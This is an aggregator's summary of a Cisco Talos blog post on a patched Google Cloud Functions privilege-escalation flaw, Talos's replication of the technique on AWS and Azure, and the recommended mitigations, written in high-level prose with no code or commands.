Source URL: https://blog.talosintelligence.com/duping-cloud-functions-an-emerging-serverless-attack-vector/
Source: Cisco Talos Blog
Title: Duping Cloud Functions: An emerging serverless attack vector
Feedly Summary: Cisco Talos built on Tenable’s discovery of a Google Cloud Platform vulnerability to uncover how attackers could exploit similar techniques across AWS and Azure.
AI Summary and Description: Yes
**Summary:** The provided text discusses a security vulnerability identified within Google Cloud Platform’s (GCP) Cloud Functions and Cloud Build services. It outlines how an excessive permissions issue in the default Cloud Build service account could be exploited by attackers to escalate privileges. The research by Tenable and subsequent testing by Cisco Talos highlight methods for leveraging the vulnerability across various cloud environments (GCP, AWS, Azure). Mitigation strategies and recommendations for security professionals are also detailed.
**Detailed Description:**
The article primarily focuses on a critical vulnerability discovered by Tenable in GCP’s Cloud Functions and Cloud Build services, which could be exploited for privilege escalation. Here’s a breakdown of the key points:
– **Vulnerability Discovery:**
– Tenable Research uncovered a vulnerability in GCP’s Cloud Functions related to improper management of service account (SA) permissions during the deployment process.
– The default Cloud Build service account granted excessive permissions, enabling attackers to escalate their privileges if they could create or update cloud functions.
– **Attack Vector Explanation:**
– Threat actors could manipulate the deployment process of a Cloud Function to leverage these excessive permissions.
– Cisco Talos replicated the attack vector across different cloud environments (AWS and Azure) using customized malicious commands embedded in the Node Package Manager (NPM) `package.json` file.
– **Technical Setup:**
– Talos conducted their tests within a configured Debian Linux server in GCP, revealing the prerequisites necessary for executing the attack, such as installations of NPM and Ngrok.
– They successfully emulated the original vulnerability to prove how attackers could extract service account tokens.
– **Enumeration Techniques:**
– A variety of enumeration techniques are detailed that could be utilized by attackers, including:
– **ICMP Discovery**: To gather network structure information.
– **Docker Environment Snapshots**: Identifying if processes are running inside containers.
– **CPU Scheduling**: Analyzing CPU scheduling details for potential vulnerabilities.
– **User and Network Discovery**: To leverage user data for escalated access.
– **Google’s Response:**
– In response to the identified vulnerabilities, Google patched the relevant issues to restrict Cloud Build SA permissions.
– Google also introduced new organization policies to retain control over default service account configurations.
– **Mitigation Strategies:**
– The direction provided emphasizes adhering to the principle of least privilege for service accounts and regularly auditing and monitoring permissions.
– Recommendations include setting up alerts for suspicious activity, inspecting network traffic for anomalies, and verifying the integrity of NPM packages used within Cloud Functions.
– **Broader Implications:**
– While the immediate exploit may now be patched, the techniques discussed highlight ongoing concerns about security configurations in cloud environments. Organizations must remain vigilant against potential adaptive misuse of similar vulnerabilities.
This analysis serves as a critical reminder for security professionals to actively manage permissions within cloud services and implement comprehensive security evaluations to mitigate evolving threats.